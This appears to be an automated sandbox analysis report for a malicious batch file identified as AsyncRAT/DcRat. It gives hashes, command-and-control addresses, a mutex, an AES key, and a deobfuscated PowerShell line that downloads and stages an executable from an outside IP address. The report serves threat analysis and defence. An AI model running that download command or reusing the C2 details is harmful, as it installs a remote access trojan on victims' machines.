General

  • Target

    6308f3eef2d45148c4544a0c31d5bb73f28dac4b6fcb854e003e2caa0c39d26f.bat

  • Size

    7KB

  • Sample

    240806-b7scsszbpf

  • MD5

    90c3dfd74d6ab4b7b98777930ab44a23

  • SHA1

    7f536fa9c3972c4416e8620335e39f9e93092103

  • SHA256

    6308f3eef2d45148c4544a0c31d5bb73f28dac4b6fcb854e003e2caa0c39d26f

  • SHA512

    aab364913c7f3972a136d2cf9241e46adf275bf74cdaedd0697746b4d0244a517a832154ead9849c36d2cc710c80e2754cff1d2b5c845041f0b5e0d6fd115a92

  • SSDEEP

    12:b4tdk5jtnrC0yyGyDF98oul666666666666HW4xmBWp/CR898U7LtaJO20c1H:b4/otrlyRKubxwWRCRKpJD8H

Malware Config

Extracted

Language
ps1
Deobfuscated
(new-object system.net.webclient).downloadfile("http://20.199.84.103/Client.exe", "C:\\Windows\\Temp\\Client.exe")
URLs
exe.dropper

http://20.199.84.103/Client.exe

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

C2

127.0.0.1:1024

20.199.84.103:1024

Mutex

DcRatMutex_qwqdanchun

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain
xkz50dzLI2BTM2SpCbBbXgX6xP7VcRLe

Targets

    • AsyncRat

      AsyncRAT is a tool written in C# that is designed to remotely monitor and control other computers.

    • Async RAT payload

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Runs PowerShell and hides the display window.

    • Downloads MZ/PE file

    • Executes dropped EXE
